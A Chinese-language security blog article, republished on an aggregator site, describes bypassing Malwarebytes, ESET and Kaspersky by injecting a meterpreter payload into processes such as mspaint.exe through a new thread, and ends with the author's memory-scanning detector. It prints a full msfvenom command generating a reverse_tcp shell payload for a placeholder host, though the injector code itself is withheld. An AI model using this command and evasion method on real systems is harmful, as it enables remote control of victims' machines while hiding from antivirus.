本文講的是免殺新姿勢(shì)：利用線程將惡意代碼注入到內(nèi)存中，
產(chǎn)生存放遠(yuǎn)程攻擊線程的進(jìn)程

在這篇文章中我不想一步一步解釋我編寫(xiě)的C#代碼，但是我會(huì)展示下它能夠繞過(guò)殺毒軟件，并且操作非常簡(jiǎn)單，而且實(shí)用。
首先說(shuō)明一下：

1.?我是在三年前發(fā)現(xiàn)這個(gè)攻擊方法的，當(dāng)我在做免殺的時(shí)候我發(fā)現(xiàn)了很多都是以0x0地址開(kāi)始的進(jìn)程。在我的win7系統(tǒng)中這種惡意代碼繞過(guò)了我的殺毒軟件，只是在內(nèi)存中可以找到，然后以系統(tǒng)權(quán)限運(yùn)行。所以，當(dāng)然是NSA干的咯！ 2.?這并不意味著以0x0開(kāi)始的進(jìn)程都是進(jìn)行惡意注入的。

就像剛才所說(shuō)，我不會(huì)將我的”NativePayload_Tinjection.exe”代碼分享出來(lái)，不過(guò)我會(huì)闡述下如何在C++，C#或者其他語(yǔ)言如何進(jìn)行編寫(xiě)攻擊poc。

下圖中你可以看到當(dāng)遠(yuǎn)程進(jìn)程加載時(shí)發(fā)生了什么事情，他已經(jīng)一步一步的展示出來(lái)。并且你可以使用C#或者其他語(yǔ)言提供的windowsAPI很簡(jiǎn)單的實(shí)現(xiàn)。

上圖中的”evil.dll”是我們通過(guò)msfvenom生成的攻擊載荷，在kali linux中可以使用以下命令:

Msfvenom?–platform?windows?–arch?x86_64?-p?windows/x64/meterpreter/reverse_tcp?lhost=w.x.y.z?-f?c?>?payload.txt

下一步驟就是將生成的payload通過(guò)新的線程注入到另外一個(gè)新的進(jìn)程中去連接遠(yuǎn)程主機(jī)。
我接下來(lái)會(huì)將我寫(xiě)的代碼進(jìn)行免殺測(cè)試，使用最新的殺毒軟件。我采用的實(shí)驗(yàn)環(huán)境是“Win 8.1”，殺毒軟件有:“Malwarebytes”、“ESET”、“Kaspersky”。接下來(lái)你可以看到，我是怎么簡(jiǎn)單繞過(guò)這三個(gè)殺毒軟件。

實(shí)驗(yàn)一：測(cè)試Malwarebyte3.1.2 版本

通過(guò)注入線程，我們可以繞過(guò)殺軟。在這個(gè)環(huán)境下，我的meterpreter payload通過(guò)TID為4268的線程注入到PID為2492的進(jìn)程，名叫mspaint.exe中。

就像你在上圖看到，當(dāng)產(chǎn)生meterpreter 會(huì)話進(jìn)程之后會(huì)在受害機(jī)中產(chǎn)生mspaint.exe進(jìn)程。同時(shí)也可以發(fā)現(xiàn)TID為4268的線程開(kāi)始地址為0X0。如果你結(jié)束掉TID 4268的線程，那么meterpreter會(huì)話就會(huì)立馬結(jié)束。

實(shí)驗(yàn)二：測(cè)試ESET-Nod3210.1.204.0版本

下圖中你可以看到，ESET已經(jīng)更新到了最近版本”20170516”，不過(guò)并沒(méi)有什么用，我同樣將meterpreter攻擊載荷通過(guò)TID 3932線程注入到了PID為3168的notepad進(jìn)程中。

實(shí)驗(yàn)三:測(cè)試Kaspersky v17版本

同樣，Kaspersky已經(jīng)是最新版本v17.0.0.611,漏洞庫(kù)為”20170516”。不過(guò)同樣被繞過(guò)了。meterpreter通過(guò)TID 2932線程注入到了PID為1200進(jìn)程中.

實(shí)驗(yàn)3-1:Kaspersky internet security v17 漏洞庫(kù)05182017版本

同樣被繞過(guò)了，即使殺毒軟件顯示：您的電腦正在被保護(hù)。

那么如何檢測(cè)這種攻擊呢？

我自己寫(xiě)了一個(gè)軟件”Meterpreter_Payload_Detection.exe”，它會(huì)在內(nèi)存識(shí)別meterpreter簽名，進(jìn)而發(fā)現(xiàn)后門，然后清除。
在下圖中你可后門發(fā)現(xiàn)繞過(guò)ESET-Nod32殺毒軟件之后，會(huì)被Meterpreter_Payload_Detection.exe攔截。所以個(gè)人感覺(jué)殺毒軟件在內(nèi)存掃描這一方面做的不是很完備。

上圖中，你可以在我軟件的界面找到注入到內(nèi)存的進(jìn)程，即PID為2116的進(jìn)程，以及TID為2820的線程。
紅顏色字體展示了在內(nèi)存中掃描簽名，當(dāng)然這也許不是最好的方法檢測(cè)惡意軟件，但是到現(xiàn)在為止，這個(gè)工具針對(duì)內(nèi)存檢測(cè)做的比現(xiàn)有的殺毒軟件要好。

原文發(fā)布時(shí)間為：2017年5月19日 本文作者：xnianq 本文來(lái)自云棲社區(qū)合作伙伴嘶吼，了解相關(guān)信息可以關(guān)注嘶吼網(wǎng)站。 原文鏈接

總結(jié)

以上是生活随笔為你收集整理的免杀新姿势：利用线程将恶意代码注入到内存中的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。